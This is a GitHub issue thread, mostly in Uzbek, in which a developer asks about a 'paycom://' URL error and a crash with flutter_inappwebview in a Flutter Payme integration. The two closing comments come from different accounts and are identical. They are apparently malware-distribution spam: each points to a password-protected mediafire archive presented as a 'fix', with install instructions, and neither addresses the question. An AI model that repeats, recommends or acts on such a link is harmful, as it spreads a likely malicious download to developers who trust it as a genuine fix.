### ISSUE TITLE
flutter_inappwebview kutubxonasi bilan muammo 

### ISSUE THREAD

**Issue by Pakhlavon** [Mamasodikov/uzpay#1]
Assalomu alaykum, men ham ilovaga payme to'lov tizimini ulayotgan edim, uladim yaxshi ishlayapti lekin bitta muammo webviewga kirganda open payme degan button bor ushani bossangiz payme ilovasi bolsa ilovadan to'lov qilish uhcun o'tib ketadi, menda shunaqa muammo borki usha button ni bosganda xatolik beryapti

paycom://checkout.paycom.uz/ 

ko'ryapgan bolsangiz paycom:// shu qism qoshilib qolyapti shuni qanday yuqotsam boladi yoki qandaydir osonroq yo'li bormi ?

**Comment by Pakhlavon** [comment]
2- muammo Agar kutubxonani flutter_inappwebview ^6.0.0 versiya bilan foydalansam ilova crash beradi

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
